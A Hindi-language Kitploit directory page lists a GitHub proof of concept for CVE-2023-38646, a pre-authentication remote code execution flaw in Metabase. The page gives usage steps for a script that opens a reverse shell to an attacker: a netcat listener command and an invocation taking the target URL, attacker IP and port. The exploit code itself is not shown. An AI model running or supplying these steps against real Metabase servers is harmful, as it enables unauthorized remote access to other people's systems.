Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-38646 — मेटाबेस प्री-ऑथ RCE POC | Kitploit
उपकरण/GitHubGitHub/mrunalkaran/cve-2023-38646
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubmrunalkaran/cve-2023-38646

CVE-2023-38646

मेटाबेस प्री-ऑथ RCE POC

रिपॉजिटरी देखें
12 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Metabase Pre-Auth RCE POC - CVE-2023-38646

Metabase ओपन सोर्स 0.46.6.1 से पहले और Metabase Enterprise 1.46.6.1 से पहले हमलावरों को सर्वर पर मनमाने कमांड निष्पादित करने की अनुमति देते हैं। मैंने हमलावर की मशीन पर रिवर्स शेल प्राप्त करने के लिए स्क्रिप्ट सीधे लिखी है।

उपयोग

स्क्रिप्ट को Target URL, Attacker का IP और Port चाहिए। इस exploit के लिए setup token प्रदान करना आवश्यक नहीं है क्योंकि स्क्रिप्ट इसे /api/session/properties से प्राप्त करने का प्रयास करती है।

Attacker मशीन पर netcat listener शुरू करना सुनिश्चित करें, निम्न कमांड का उपयोग करके: nc -nlvp {Port}

POC स्क्रिप्ट को निम्न के साथ चलाएँ:

  • -u - लक्ष्य URL (Metabase)
  • -ip - Attacker का IP
  • -p - पोर्ट संख्या
root@kitploit:~
python3 CVE-2023-38646.py -u <target-url> -ip <IP> -p <PORT>

POC

संदर्भ

  • https://github.com/m3m0o/metabase-pre-auth-rce-poc/
  • https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/
  • टूल डाउनलोड करें